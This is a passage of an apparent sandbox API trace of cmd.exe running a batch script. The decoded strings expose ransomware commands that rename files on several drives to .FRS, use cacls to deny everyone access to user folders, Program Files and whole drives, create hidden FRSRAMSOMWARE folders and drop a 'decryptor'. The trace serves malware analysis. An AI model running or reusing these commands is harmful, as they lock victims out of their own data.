hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0096.750] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0096.750] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0096.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0096.750] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.750] GetFileType (hFile=0x260) returned 0x1 [0096.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0096.750] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0096.750] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0096.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0096.750] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.750] GetFileType (hFile=0x260) returned 0x1 [0096.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0096.750] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0096.750] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0096.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0096.750] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.750] GetFileType (hFile=0x260) returned 0x1 [0096.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0096.750] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0096.750] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0096.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0096.751] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.751] GetFileType (hFile=0x260) returned 0x1 [0096.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0096.751] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0096.751] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0096.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0096.751] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.751] GetFileType (hFile=0x260) returned 0x1 [0096.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0096.751] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0096.751] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0096.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0096.751] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.751] GetFileType (hFile=0x260) returned 0x1 [0096.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0096.751] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0096.751] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0096.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0096.751] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.751] GetFileType (hFile=0x260) returned 0x1 [0096.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0096.751] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0096.751] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0096.751] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0096.751] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.752] GetFileType (hFile=0x260) returned 0x1 [0096.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0096.752] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0096.752] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0096.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0096.752] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.752] GetFileType (hFile=0x260) returned 0x1 [0096.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0096.752] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0096.752] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0096.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0096.752] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.752] GetFileType (hFile=0x260) returned 0x1 [0096.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0096.752] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0096.752] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0096.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0096.752] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.752] GetFileType (hFile=0x260) returned 0x1 [0096.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0096.752] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0096.752] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0096.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0096.752] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.752] GetFileType (hFile=0x260) returned 0x1 [0096.752] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0096.753] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0096.753] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0096.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0096.753] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.753] GetFileType (hFile=0x260) returned 0x1 [0096.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0096.753] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0096.753] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0096.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0096.753] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.753] GetFileType (hFile=0x260) returned 0x1 [0096.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0096.753] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0096.753] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0096.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0096.753] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.753] GetFileType (hFile=0x260) returned 0x1 [0096.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0096.753] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0096.753] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0096.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0096.753] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.753] GetFileType (hFile=0x260) returned 0x1 [0096.753] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0096.754] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0096.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0096.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0096.754] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.754] GetFileType (hFile=0x260) returned 0x1 [0096.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0096.754] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0096.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0096.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0096.754] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.754] GetFileType (hFile=0x260) returned 0x1 [0096.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0096.754] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0096.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0096.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0096.754] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.754] GetFileType (hFile=0x260) returned 0x1 [0096.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0096.754] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0096.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0096.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0096.754] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.754] GetFileType (hFile=0x260) returned 0x1 [0096.754] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0096.754] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0096.755] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0096.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0096.755] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.755] GetFileType (hFile=0x260) returned 0x1 [0096.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0096.755] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0096.755] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0096.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0096.755] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.755] GetFileType (hFile=0x260) returned 0x1 [0096.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0096.755] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0096.755] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0096.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0096.755] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.755] GetFileType (hFile=0x260) returned 0x1 [0096.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0096.755] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.755] SetFilePointer (in: hFile=0x260, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0096.755] 